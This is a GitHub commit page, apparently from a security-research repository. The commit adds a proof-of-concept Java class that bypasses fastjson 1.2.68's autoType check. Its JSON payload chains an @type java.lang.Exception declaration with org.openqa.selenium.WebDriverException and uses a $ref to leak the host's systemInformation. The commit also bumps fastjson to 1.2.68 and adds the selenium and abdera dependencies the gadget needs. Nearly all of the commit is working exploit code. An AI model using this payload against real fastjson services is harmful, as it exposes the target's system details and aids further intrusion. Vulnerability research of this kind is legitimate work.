Skip to content

Commit 08602ce

Browse files
author
“threedr3am”
committed
add:fastjson gadget bypass 1.2.68 autoType - leak
1 parent 91f5208 commit 08602ce

File tree

3 files changed

+44
-2
lines changed

3 files changed

+44
-2
lines changed

fastjson/pom.xml

Lines changed: 14 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -16,7 +16,7 @@
1616
<dependency>
1717
<groupId>com.alibaba</groupId>
1818
<artifactId>fastjson</artifactId>
19-
<version>1.2.62</version>
19+
<version>1.2.68</version>
2020
</dependency>
2121

2222
<dependency>
@@ -32,6 +32,19 @@
3232
<version>3.4.1</version>
3333
</dependency>
3434

35+
<dependency>
36+
<groupId>org.seleniumhq.selenium</groupId>
37+
<artifactId>selenium-api</artifactId>
38+
<version>3.141.59</version>
39+
</dependency>
40+
41+
<!-- https://mvnrepository.com/artifact/org.apache.abdera/abdera-core -->
42+
<dependency>
43+
<groupId>org.apache.abdera</groupId>
44+
<artifactId>abdera-server</artifactId>
45+
<version>1.1.2</version>
46+
</dependency>
47+
3548
<dependency>
3649
<groupId>commons-configuration</groupId>
3750
<artifactId>commons-configuration</artifactId>

fastjson/src/main/java/com/threedr3am/bug/fastjson/leak/seleniumBypassAutotype1_2_68.java

Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
package com.threedr3am.bug.fastjson.leak;
2+
3+
import com.alibaba.fastjson.JSON;
4+
import com.alibaba.fastjson.JSONObject;
5+
6+
/**
7+
* bypass autotype <= 1.2.68
8+
*/
9+
public class seleniumBypassAutotype1_2_68 {
10+
11+
public static void main(String[] args) {
12+
13+
String payload = "\n"
14+
+ "{\n"
15+
+ " \"name\":\"tony\",\n"
16+
+ " \"email\":\"[email protected]\",\n"
17+
+ " \"content\":{\"$ref\":\"$x.systemInformation\"},\n"
18+
+ " \"x\":{\n"
19+
+ " \"@type\":\"java.lang.Exception\",\"@type\":\"org.openqa.selenium.WebDriverException\"\n"
20+
+ " }\n"
21+
+ "}";
22+
try {
23+
JSONObject jsonObject = JSON.parseObject(payload);
24+
System.out.println(jsonObject.getString("content"));
25+
} catch (Exception e) {
26+
e.printStackTrace();
27+
}
28+
}
29+
}

feature/pom.xml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -51,7 +51,7 @@
5151
<dependency>
5252
<groupId>com.alibaba</groupId>
5353
<artifactId>fastjson</artifactId>
54-
<version>1.2.62</version>
54+
<version>1.2.68</version>
5555
</dependency>
5656
</dependencies>
5757

0 commit comments

Comments
 (0)